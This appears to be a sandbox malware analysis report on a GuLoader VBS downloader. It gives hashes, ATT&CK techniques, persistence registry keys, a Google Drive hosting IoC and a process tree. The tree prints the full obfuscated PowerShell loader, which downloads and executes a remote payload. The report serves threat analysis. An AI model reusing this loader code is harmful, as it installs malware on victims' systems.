guloader | 6ca31f97ab9de51d44d1fab3207f4b03ea9f09a282d29ae3d7537ff965211f47

General

Target

6ca31f97ab9de51d44d1fab3207f4b03ea9f09a282d29ae3d7537ff965211f47.vbs
Size

26KB
MD5

ad1f9096929a1c7dee6bd63d6a8ab330
SHA1

1f0d1dbbfb49713f8c53dc798a14ebeb661e49dc
SHA256

6ca31f97ab9de51d44d1fab3207f4b03ea9f09a282d29ae3d7537ff965211f47
SHA512

2b26aed4c2bacb25bde5f1fc1de2c5c061a852cdc8156b4f2bd2a72f40ce664e6a5b40728ea3754aa2caa4d9a847be4fb173e2051ecb118562d17e372aba0c23
SSDEEP

384:9nZHk2uAn/wy4C56jf76Y/dMNMzkGYVBm2B80O:9nZE26CA76GdMiz1aZBHO

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	wevtutil.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\GJK0V = "C:\\Program Files (x86)\\windows mail\\wab.exe"	wevtutil.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	6116	WScript.exe
8	3512	powershell.exe
10	3512	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
8	drive.google.com
30	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
6112	wab.exe
6112	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
5460	powershell.exe
6112	wab.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 5460 set thread context of 6112	5460	powershell.exe	97
PID 6112 set thread context of 3384	6112	wab.exe	56
PID 6112 set thread context of 3024	6112	wab.exe	99
PID 3024 set thread context of 3384	3024	wevtutil.exe	56
PID 3024 set thread context of 5076	3024	wevtutil.exe	100

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	wevtutil.exe

Suspicious behavior: EnumeratesProcesses 51 IoCs

pid	Process
3512	powershell.exe
3512	powershell.exe
5460	powershell.exe
5460	powershell.exe
5460	powershell.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
6112	wab.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
5460	powershell.exe
6112	wab.exe
3384	Explorer.EXE
3384	Explorer.EXE
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe
3024	wevtutil.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3512	powershell.exe
Token: SeDebugPrivilege	5460	powershell.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3384	Explorer.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 6116 wrote to memory of 3512	6116	WScript.exe	83
PID 6116 wrote to memory of 3512	6116	WScript.exe	83
PID 3512 wrote to memory of 948	3512	powershell.exe	85
PID 3512 wrote to memory of 948	3512	powershell.exe	85
PID 3512 wrote to memory of 5460	3512	powershell.exe	92
PID 3512 wrote to memory of 5460	3512	powershell.exe	92
PID 3512 wrote to memory of 5460	3512	powershell.exe	92
PID 5460 wrote to memory of 2436	5460	powershell.exe	94
PID 5460 wrote to memory of 2436	5460	powershell.exe	94
PID 5460 wrote to memory of 2436	5460	powershell.exe	94
PID 5460 wrote to memory of 6112	5460	powershell.exe	97
PID 5460 wrote to memory of 6112	5460	powershell.exe	97
PID 5460 wrote to memory of 6112	5460	powershell.exe	97
PID 5460 wrote to memory of 6112	5460	powershell.exe	97
PID 5460 wrote to memory of 6112	5460	powershell.exe	97
PID 3384 wrote to memory of 3024	3384	Explorer.EXE	99
PID 3384 wrote to memory of 3024	3384	Explorer.EXE	99
PID 3384 wrote to memory of 3024	3384	Explorer.EXE	99
PID 3024 wrote to memory of 5076	3024	wevtutil.exe	100
PID 3024 wrote to memory of 5076	3024	wevtutil.exe	100

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3384
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6ca31f97ab9de51d44d1fab3207f4b03ea9f09a282d29ae3d7537ff965211f47.vbs"
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:6116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedvrdigelsens = 1;Function Stoplygten($Kapunering){$burnett=$Kapunering.Length-$Nedvrdigelsens;$Analyseapparatet='Substring';For( $Grantedly=7;$Grantedly -lt $burnett;$Grantedly+=8){$Cleistogamy+=$Kapunering.$Analyseapparatet.Invoke( $Grantedly, $Nedvrdigelsens);}$Cleistogamy;}function Chiasmodon($Benzoquinoline){ . ($Heriotable) ($Benzoquinoline);}$Conchylium=Stoplygten 'tilsmilMConflagoContraszLankn,si Violallwargscalpro ilea Kister/Strad.v5 Friord.konfirm0Eksilre Torvity(KommandW erciaaiSixpencn oltakodHuntsmao BombstwBug indsOuteati landbruNKlbetimTUndil.t Ginnieb1 Rad os0Omdbers.Trirska0postcom; G,aved ArbejdsWVangeseiPolygonn Intars6Ishmael4Contuma;Aabred UdenrigxDe,otio6Elsewhe4Pylorop;Udsigts Delma.lr,orstaavKl usul: Unfear1Drivkra2Grammof1Farrier.Outsulk0Kraever) Opkal, SildebeGAntn eaeHexenescCertifik Diar eo Blasph/Lrerrol2korsbaa0desmide1 Hje ne0Taberna0Regnes 1Inco.er0Slngkap1Lindber UdlbsdaF ExpliciAnraaberRabatkue Genne.f SelvbyoKidnappxTillemp/Le,evrd1Nonphos2Gr nger1Forklar.Misst m0U,debat ';$Protochlorophyll=Stoplygten 'Ufulds UKontantsToldbodeBrolkkerInd.oer-OgcocepA .nhngeg Worthee Lardern Pill atcalefac ';$Lamper=Stoplygten 'Noncre.hBer,sertPhosphotPraepospMedmennsCog.eud:Pikante/Navngiv/Unhud.ld Th.rsirStenbedi,ejlansv g,mpese Nedstt.Mervin gChr.sidolngselsoSansei gPreparilSchufteeDehydro.Trakte cStigninoSociolomEn.angs/BossletuEndoss.cEks omm?Hindb mefr,mmedxDioscurpAglipayoDecol,urConvi ot Lousil=siescardLaborleoPulsaa w Re,tocn sensiblkremernoUnderchaDecretod S,denv&M,lliseiRatstamdUnlusti=Leverin1Datesur3Un ergiVDraki,u2Press,a-Tem,elsrBilledhuk besky8br ndekBHelio h7Po.padoJSquamu.7SvampekGqueri slLaeresar Coylysh ulticoLrangs,iPSpaakllFRadaroveHdersgaR CinephRCentralGUn naloNOvipo iU,ondeciySecernembu.hmooeBesmithV imoteg7Min.stifHusbesttTeater.P ,osegr ';$Heaper=Stoplygten ' I,ioti>Blephar ';$Heriotable=Stoplygten 'E.skommiIodizepeDik.graxintrapa ';$Priorate134='Bereter';$Indersidens = Stoplygten 'MotitateFrost.ocTilgodehgingalloKrimina kinhel% BrillaaViolacep LuftlapMastatrdMinderaaMiksturt Jgers aTutor.o%Aktives\SlvmedaUKantinen PensioiBolabrtnFri urenSwankie..ubikmepCounte.aFallennp.ndkber Bogstav&K,ffeka&A,hesba Abstr.seFortalec racheohAntic noTurcykl divisi tbelemri ';Chiasmodon (Stoplygten 'dri kyg$OverarbgSideordlFicuseno F rretbMushl.sa SkyldilEsso ns:WarpageKf.rsorguKi kehalS ideritArtsflli ManualvPaddlefeU,schemrYentetriCaravannHastighgArchit,eMirkinenTailbon5Krampet0Orthoti=An.ikvi( sy.bolcWergeldmEnque.edVest re ,ersona/ D.kedeczonedre Varmluf$PumpedcISuperven Kabaled DelikaeSebastirAsbestcsPlasthyiTidlstodSk epibeHyperaln ttsk.esfiskesn) S,ovfo ');Chiasmodon (Stoplygten 'Skoleda$.epeoplgDiplomplMedlemso StandabMilieupaLejlighl Srsyne:AnnonceTArmatu eTetrazyrtwistifr D,ueagiCiselert FunctooPaaskedr S,otteiReces.eaMementolStykenegReillumrPan.gyrnTinktu.sY,gelpleGennembs Rigsgr1O.eremp6Mineral7 For.th= Skon e$ oarselLHanke daUniversm SamfrdpDokum,neKamarilrkineti..UncrannstaiyaltpForbr glSuggestiFraynbjtDemip,o( Gangst$diaskeuHRa,bitmeUdt.rina EkkoetpAltruiseNarvsmorTaktart)Homet,w ');$Lamper=$Territorialgrnses167[0];$Immolating142= (Stoplygten ' Dit,og$ AtmostgMaaned lSmerksnoOverflobTingsr aGgeledelEkspl.c:SkrivesIAmarantn.imelestSt,matieMarjorarStjfiltflevit.eo HedtvalForbedriFoelelsaEksplodr Demesg=NonencyNHexac re S.beslwBrugerg-p,cnidiOBowerwob araktejFrenzieeStilstacUnvotintSwinebr ,atricSForeneryKrock tsungyveftPodginee Reacc.mTelefon.PaleoecN DrgrebeB.rnesktPattoos.Disput,W Over aeTriodonbReinfusCfidej,sl B,emseiAfdampneUnremitnUregerlt');$Immolating142+=$Kultiveringen50[1];Chiasmodon ($Immolating142);Chiasmodon (Stoplygten 'Unvi la$Det ljeIPredecinTingfstt KloakeeHal.tagr,orbrndfIron.lao AxonsulM.derkaimonophyaSalinomra,amoda.Bism,soHTall,weeAdopteeaRepressd Thridte FlskegrMetamors Maners[Klau ul$ D,mophPBehagelrHeresiooMispagetBev.rinobalalajcAr,ejdehLoritaslTrbaadeoDisordir.eekendoIndtastpHeltershBomuldsy DesecrlAnde,kllKokasse]Tuskabn=Ornitho$skruestCNarkoseoJargoninRensdyrc ProtochB.lharzy ResymblZelmakoifor.iklu BagbunmAl rarg ');$Anklagepunkts116=Stoplygten ' Autodi$Hand.lsI SphaernAfspadst UnexcieBoltroprNorm.lifFejlbe.ojowlishlSen,orhi Pernila anorerrVartegn.Afpre sDSpan.eroPast lfwKh nerpnFolierslEnbaisso Futteda Ari ond,egaphoFPaagribiUnprecilBlnddree.rteagt( Torers$ specifLpresu iaAfslibnmUnmeddlp SopitieKvkerbarMadrasa,Firdobl$Over.nseJ,vialinTerminotVilifieoInvestimUniformo Orderll Despero sla,skgSplendoiTreachesFr.etowtVrt,rne)Resubmi ';$entomologist=$Kultiveringen50[0];Chiasmodon (Stoplygten ' inf.ng$Stormagg Moriscl MundstoFilcherb esk rtaDissektl.dfrsel:Pa tisoPDisagreuReubennd A.tylorOpskreriFestlignSyecapigVerashe= ,monis(TiebackT lase.deSammensskoe,sletSnvlsse-p.nnatiPVandbehaPreadvotAntinihhEdmondp Mmendeb$Pulvin,eStyknumnFremfritCucurbioge,nemsmMannequoBollardlUnarduooGoosepigSlurppriRollelis AimbletVansiri)Pre,ene ');while (!$Pudring) {Chiasmodon (Stoplygten 'Platyrr$kiselalgHistoril Afgif,o Overspbdegressa,emicynlPostpak:UngaudyB,uldmnte patriag U pintr Papi.teMegaherbClupeavn FuldrieStruktu=En,opar$Ud,apnitRektangrIn.ustru Haand.eOldebr ') ;Chiasmodon $Anklagepunkts116;Chiasmodon (Stoplygten 'DollymeSSkimtettKamikazaAntibiorAbortintVingaar- g biadS St dielseaman,eGiantz.eStenhugpUnpaste Sw etme4 Surfca ');Chiasmodon (Stoplygten 'Brevvek$R eriskg.rkeyralOverfanogeddenzbOrdinataTe.stsmlM nospo:Tillid.PBetonswuP ymoutd Beg avrMelodifiGandhi,nAld holg Glauc,=Gte.kab( Hema.iTBodyb.ieforefunsBondedrtSukkers-Paragr,PHonningaMacrosctLandrachNserhan Planle$Mo,olateDraabeinPreallotRaadhusoSme.ninm Yam,asoSt.awislSeptumkoNosebaggLea,wooiInspeaksshirtintcolombi)S.espur ') ;Chiasmodon (Stoplygten 'Sa.doni$EnemyshgAssientlUtilstroRe.onnobunderbeaPe.osphlUnder.a:IldfuldM subproa PottinkOrganissV,lgbar=Bahrain$MispringresterilApalachoMuggingbFac,lita AnilinlSpeleog: BrndglP Ste,diaTrisagisOrlogsknAcceptki Daid.inBlo.erig S ineheAbovegrrSalmoninEmbiotoeInsemins Nsk,br+Ticktac+ Sskend%Goatsta$contrarTunicente Ob.igarDiphthorFungosei PacifitTvrfljtoMonocerrRhizotoiBromselaMolarizlNormanigReichstrDelestrn SubtresTilvirkeWoodoossWashies1Ebriosi6Femaars7predece.Faldgruc.krukhnoThesmopu.russelnArbej ethistrio ') ;$Lamper=$Territorialgrnses167[$Maks];}$Aryballoi=326247;$Forbrugt=29330;Chiasmodon (Stoplygten 'Leukmif$ Hysso.gTabacinlBe.igtioCourantbAz.rystapharyngl,irmabi:UnvolupT DregasrStraffoe De.elesEuryp akColubriiWardsmafJentjentNautilieCallanttTotalit Meningi=Udtv in RafteheG F ruree ColluttCal.for-,emurriCa lokeroSoltimenlo.hiodtTe nebreEksposinAsketentPreprim fredee$UrochoreUn iffrnSoletbytshuttlio.osmopomTamsvinoO,erprolS nctimoTillg mg RentetiNonlic,sEmotiont Ch sti ');Chiasmodon (Stoplygten ' K.rmew$ChristigProtectlA,undanosk dsorbErfar.navietnamlAndejag:UnplankKDevsspoaDksoffim OrnithfNrbanemeS,bjectrPeereds ovtrkn=Kunos.o Biofagc[ForblfrSEllevilyT pefals Menubit MurermepseudoxmNightma.DiagonaC.esperkoBaulkmonlymphanv UnpeaceOrdreberMatchbotSpl.noc]Gymnast:Concurr:RevisioFUnci,lbr wansh oIkrafttm unree.B Komm.saodont.ns utsine Trves.6Flynder4 UdmundSAfskedstovertegrSup rimiRetshisnIonenshgEsplana(Botryot$BelgninT tewardr Nonariecantatos Sunitak SlagpliBr,stnifCasinaotHyster enamal et Blegep) Fracti ');Chiasmodon (Stoplygten 'Emb.les$U magergDuel ghlSndenvioH.rizonbHjemkalaoutsouglDuansoc:RadioakfLivsforiFrappedrWhisperlSilesiaiPeregrinMannaiagJulerose Celebrn dkoblesIndustr Attraav=Iderige pudd.ng[ In.rodSdecisioyEks ropsTelefontSeve.iseAscaridmSkattes.GambollT Ski dreBrorsnnxClompwotAfdelin.Gstm,ldE SeddelnSandhedc rnendeo airiald PeltmoiNascencn Strygeg Slaask]Diktatu:Pluckin:SubapprAVaregruSArchmacC DobranIMelano.I Square.BathyscGMisentieNedgangt Uforu,SNatarbetContemprBinde.eiSlampannEr,micsg bestil( Endoka$Fljtes.KAfmont aPodophym Ar ysufFalsetteSatsersr Opaque)Misspe, ');Chiasmodon (Stoplygten 'Ingefrs$Bedir ygLuovejll forlovoIsocap,b Akkv ea Is.batlafhandl:Plig foDVapouryoSn,glatg ImpactmSocial,aRhebositSecul riinexp esTerag.ieConstanrStetikkeOpstilldBrugdeseHyp.xansAdo esc=.rnehal$Contestf Emanati NeuroarDesignsl RasminiVaselinnP.emiergI.locale ThienynL,culicsNautrup.MecodonsJudiciauUnderwobBrudurts KassettFdse,sarbogrul.iMeticu.nChen,pogVurderi( Nomina$HolosteARustplerTridermyUnenuncb arvebaUndrestlK.ydderlNessle o Silkesisoc,ero, Overqu$Pr mediFPy.hogeoFarsoter PlanobbCcoasamrprogramu Pa satginterkntRubrici)fredsti ');Chiasmodon $Dogmatiseredes;"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3512
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Uninn.pap && echo t"
      4⤵
      PID:948
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedvrdigelsens = 1;Function Stoplygten($Kapunering){$burnett=$Kapunering.Length-$Nedvrdigelsens;$Analyseapparatet='Substring';For( $Grantedly=7;$Grantedly -lt $burnett;$Grantedly+=8){$Cleistogamy+=$Kapunering.$Analyseapparatet.Invoke( $Grantedly, $Nedvrdigelsens);}$Cleistogamy;}function Chiasmodon($Benzoquinoline){ . ($Heriotable) ($Benzoquinoline);}$Conchylium=Stoplygten 'tilsmilMConflagoContraszLankn,si Violallwargscalpro ilea Kister/Strad.v5 Friord.konfirm0Eksilre Torvity(KommandW erciaaiSixpencn oltakodHuntsmao BombstwBug indsOuteati landbruNKlbetimTUndil.t Ginnieb1 Rad os0Omdbers.Trirska0postcom; G,aved ArbejdsWVangeseiPolygonn Intars6Ishmael4Contuma;Aabred UdenrigxDe,otio6Elsewhe4Pylorop;Udsigts Delma.lr,orstaavKl usul: Unfear1Drivkra2Grammof1Farrier.Outsulk0Kraever) Opkal, SildebeGAntn eaeHexenescCertifik Diar eo Blasph/Lrerrol2korsbaa0desmide1 Hje ne0Taberna0Regnes 1Inco.er0Slngkap1Lindber UdlbsdaF ExpliciAnraaberRabatkue Genne.f SelvbyoKidnappxTillemp/Le,evrd1Nonphos2Gr nger1Forklar.Misst m0U,debat ';$Protochlorophyll=Stoplygten 'Ufulds UKontantsToldbodeBrolkkerInd.oer-OgcocepA .nhngeg Worthee Lardern Pill atcalefac ';$Lamper=Stoplygten 'Noncre.hBer,sertPhosphotPraepospMedmennsCog.eud:Pikante/Navngiv/Unhud.ld Th.rsirStenbedi,ejlansv g,mpese Nedstt.Mervin gChr.sidolngselsoSansei gPreparilSchufteeDehydro.Trakte cStigninoSociolomEn.angs/BossletuEndoss.cEks omm?Hindb mefr,mmedxDioscurpAglipayoDecol,urConvi ot Lousil=siescardLaborleoPulsaa w Re,tocn sensiblkremernoUnderchaDecretod S,denv&M,lliseiRatstamdUnlusti=Leverin1Datesur3Un ergiVDraki,u2Press,a-Tem,elsrBilledhuk besky8br ndekBHelio h7Po.padoJSquamu.7SvampekGqueri slLaeresar Coylysh ulticoLrangs,iPSpaakllFRadaroveHdersgaR CinephRCentralGUn naloNOvipo iU,ondeciySecernembu.hmooeBesmithV imoteg7Min.stifHusbesttTeater.P ,osegr ';$Heaper=Stoplygten ' I,ioti>Blephar ';$Heriotable=Stoplygten 'E.skommiIodizepeDik.graxintrapa ';$Priorate134='Bereter';$Indersidens = Stoplygten 'MotitateFrost.ocTilgodehgingalloKrimina kinhel% BrillaaViolacep LuftlapMastatrdMinderaaMiksturt Jgers aTutor.o%Aktives\SlvmedaUKantinen PensioiBolabrtnFri urenSwankie..ubikmepCounte.aFallennp.ndkber Bogstav&K,ffeka&A,hesba Abstr.seFortalec racheohAntic noTurcykl divisi tbelemri ';Chiasmodon (Stoplygten 'dri kyg$OverarbgSideordlFicuseno F rretbMushl.sa SkyldilEsso ns:WarpageKf.rsorguKi kehalS ideritArtsflli ManualvPaddlefeU,schemrYentetriCaravannHastighgArchit,eMirkinenTailbon5Krampet0Orthoti=An.ikvi( sy.bolcWergeldmEnque.edVest re ,ersona/ D.kedeczonedre Varmluf$PumpedcISuperven Kabaled DelikaeSebastirAsbestcsPlasthyiTidlstodSk epibeHyperaln ttsk.esfiskesn) S,ovfo ');Chiasmodon (Stoplygten 'Skoleda$.epeoplgDiplomplMedlemso StandabMilieupaLejlighl Srsyne:AnnonceTArmatu eTetrazyrtwistifr D,ueagiCiselert FunctooPaaskedr S,otteiReces.eaMementolStykenegReillumrPan.gyrnTinktu.sY,gelpleGennembs Rigsgr1O.eremp6Mineral7 For.th= Skon e$ oarselLHanke daUniversm SamfrdpDokum,neKamarilrkineti..UncrannstaiyaltpForbr glSuggestiFraynbjtDemip,o( Gangst$diaskeuHRa,bitmeUdt.rina EkkoetpAltruiseNarvsmorTaktart)Homet,w ');$Lamper=$Territorialgrnses167[0];$Immolating142= (Stoplygten ' Dit,og$ AtmostgMaaned lSmerksnoOverflobTingsr aGgeledelEkspl.c:SkrivesIAmarantn.imelestSt,matieMarjorarStjfiltflevit.eo HedtvalForbedriFoelelsaEksplodr Demesg=NonencyNHexac re S.beslwBrugerg-p,cnidiOBowerwob araktejFrenzieeStilstacUnvotintSwinebr ,atricSForeneryKrock tsungyveftPodginee Reacc.mTelefon.PaleoecN DrgrebeB.rnesktPattoos.Disput,W Over aeTriodonbReinfusCfidej,sl B,emseiAfdampneUnremitnUregerlt');$Immolating142+=$Kultiveringen50[1];Chiasmodon ($Immolating142);Chiasmodon (Stoplygten 'Unvi la$Det ljeIPredecinTingfstt KloakeeHal.tagr,orbrndfIron.lao AxonsulM.derkaimonophyaSalinomra,amoda.Bism,soHTall,weeAdopteeaRepressd Thridte FlskegrMetamors Maners[Klau ul$ D,mophPBehagelrHeresiooMispagetBev.rinobalalajcAr,ejdehLoritaslTrbaadeoDisordir.eekendoIndtastpHeltershBomuldsy DesecrlAnde,kllKokasse]Tuskabn=Ornitho$skruestCNarkoseoJargoninRensdyrc ProtochB.lharzy ResymblZelmakoifor.iklu BagbunmAl rarg ');$Anklagepunkts116=Stoplygten ' Autodi$Hand.lsI SphaernAfspadst UnexcieBoltroprNorm.lifFejlbe.ojowlishlSen,orhi Pernila anorerrVartegn.Afpre sDSpan.eroPast lfwKh nerpnFolierslEnbaisso Futteda Ari ond,egaphoFPaagribiUnprecilBlnddree.rteagt( Torers$ specifLpresu iaAfslibnmUnmeddlp SopitieKvkerbarMadrasa,Firdobl$Over.nseJ,vialinTerminotVilifieoInvestimUniformo Orderll Despero sla,skgSplendoiTreachesFr.etowtVrt,rne)Resubmi ';$entomologist=$Kultiveringen50[0];Chiasmodon (Stoplygten ' inf.ng$Stormagg Moriscl MundstoFilcherb esk rtaDissektl.dfrsel:Pa tisoPDisagreuReubennd A.tylorOpskreriFestlignSyecapigVerashe= ,monis(TiebackT lase.deSammensskoe,sletSnvlsse-p.nnatiPVandbehaPreadvotAntinihhEdmondp Mmendeb$Pulvin,eStyknumnFremfritCucurbioge,nemsmMannequoBollardlUnarduooGoosepigSlurppriRollelis AimbletVansiri)Pre,ene ');while (!$Pudring) {Chiasmodon (Stoplygten 'Platyrr$kiselalgHistoril Afgif,o Overspbdegressa,emicynlPostpak:UngaudyB,uldmnte patriag U pintr Papi.teMegaherbClupeavn FuldrieStruktu=En,opar$Ud,apnitRektangrIn.ustru Haand.eOldebr ') ;Chiasmodon $Anklagepunkts116;Chiasmodon (Stoplygten 'DollymeSSkimtettKamikazaAntibiorAbortintVingaar- g biadS St dielseaman,eGiantz.eStenhugpUnpaste Sw etme4 Surfca ');Chiasmodon (Stoplygten 'Brevvek$R eriskg.rkeyralOverfanogeddenzbOrdinataTe.stsmlM nospo:Tillid.PBetonswuP ymoutd Beg avrMelodifiGandhi,nAld holg Glauc,=Gte.kab( Hema.iTBodyb.ieforefunsBondedrtSukkers-Paragr,PHonningaMacrosctLandrachNserhan Planle$Mo,olateDraabeinPreallotRaadhusoSme.ninm Yam,asoSt.awislSeptumkoNosebaggLea,wooiInspeaksshirtintcolombi)S.espur ') ;Chiasmodon (Stoplygten 'Sa.doni$EnemyshgAssientlUtilstroRe.onnobunderbeaPe.osphlUnder.a:IldfuldM subproa PottinkOrganissV,lgbar=Bahrain$MispringresterilApalachoMuggingbFac,lita AnilinlSpeleog: BrndglP Ste,diaTrisagisOrlogsknAcceptki Daid.inBlo.erig S ineheAbovegrrSalmoninEmbiotoeInsemins Nsk,br+Ticktac+ Sskend%Goatsta$contrarTunicente Ob.igarDiphthorFungosei PacifitTvrfljtoMonocerrRhizotoiBromselaMolarizlNormanigReichstrDelestrn SubtresTilvirkeWoodoossWashies1Ebriosi6Femaars7predece.Faldgruc.krukhnoThesmopu.russelnArbej ethistrio ') ;$Lamper=$Territorialgrnses167[$Maks];}$Aryballoi=326247;$Forbrugt=29330;Chiasmodon (Stoplygten 'Leukmif$ Hysso.gTabacinlBe.igtioCourantbAz.rystapharyngl,irmabi:UnvolupT DregasrStraffoe De.elesEuryp akColubriiWardsmafJentjentNautilieCallanttTotalit Meningi=Udtv in RafteheG F ruree ColluttCal.for-,emurriCa lokeroSoltimenlo.hiodtTe nebreEksposinAsketentPreprim fredee$UrochoreUn iffrnSoletbytshuttlio.osmopomTamsvinoO,erprolS nctimoTillg mg RentetiNonlic,sEmotiont Ch sti ');Chiasmodon (Stoplygten ' K.rmew$ChristigProtectlA,undanosk dsorbErfar.navietnamlAndejag:UnplankKDevsspoaDksoffim OrnithfNrbanemeS,bjectrPeereds ovtrkn=Kunos.o Biofagc[ForblfrSEllevilyT pefals Menubit MurermepseudoxmNightma.DiagonaC.esperkoBaulkmonlymphanv UnpeaceOrdreberMatchbotSpl.noc]Gymnast:Concurr:RevisioFUnci,lbr wansh oIkrafttm unree.B Komm.saodont.ns utsine Trves.6Flynder4 UdmundSAfskedstovertegrSup rimiRetshisnIonenshgEsplana(Botryot$BelgninT tewardr Nonariecantatos Sunitak SlagpliBr,stnifCasinaotHyster enamal et Blegep) Fracti ');Chiasmodon (Stoplygten 'Emb.les$U magergDuel ghlSndenvioH.rizonbHjemkalaoutsouglDuansoc:RadioakfLivsforiFrappedrWhisperlSilesiaiPeregrinMannaiagJulerose Celebrn dkoblesIndustr Attraav=Iderige pudd.ng[ In.rodSdecisioyEks ropsTelefontSeve.iseAscaridmSkattes.GambollT Ski dreBrorsnnxClompwotAfdelin.Gstm,ldE SeddelnSandhedc rnendeo airiald PeltmoiNascencn Strygeg Slaask]Diktatu:Pluckin:SubapprAVaregruSArchmacC DobranIMelano.I Square.BathyscGMisentieNedgangt Uforu,SNatarbetContemprBinde.eiSlampannEr,micsg bestil( Endoka$Fljtes.KAfmont aPodophym Ar ysufFalsetteSatsersr Opaque)Misspe, ');Chiasmodon (Stoplygten 'Ingefrs$Bedir ygLuovejll forlovoIsocap,b Akkv ea Is.batlafhandl:Plig foDVapouryoSn,glatg ImpactmSocial,aRhebositSecul riinexp esTerag.ieConstanrStetikkeOpstilldBrugdeseHyp.xansAdo esc=.rnehal$Contestf Emanati NeuroarDesignsl RasminiVaselinnP.emiergI.locale ThienynL,culicsNautrup.MecodonsJudiciauUnderwobBrudurts KassettFdse,sarbogrul.iMeticu.nChen,pogVurderi( Nomina$HolosteARustplerTridermyUnenuncb arvebaUndrestlK.ydderlNessle o Silkesisoc,ero, Overqu$Pr mediFPy.hogeoFarsoter PlanobbCcoasamrprogramu Pa satginterkntRubrici)fredsti ');Chiasmodon $Dogmatiseredes;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5460
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Uninn.pap && echo t"
        5⤵
        
        PID:2436
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:6112
- C:\Windows\SysWOW64\wevtutil.exe
  "C:\Windows\SysWOW64\wevtutil.exe"
  2⤵
  - Adds policy Run key to start application
  - Suspicious use of SetThreadContext
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3024
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:5076

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

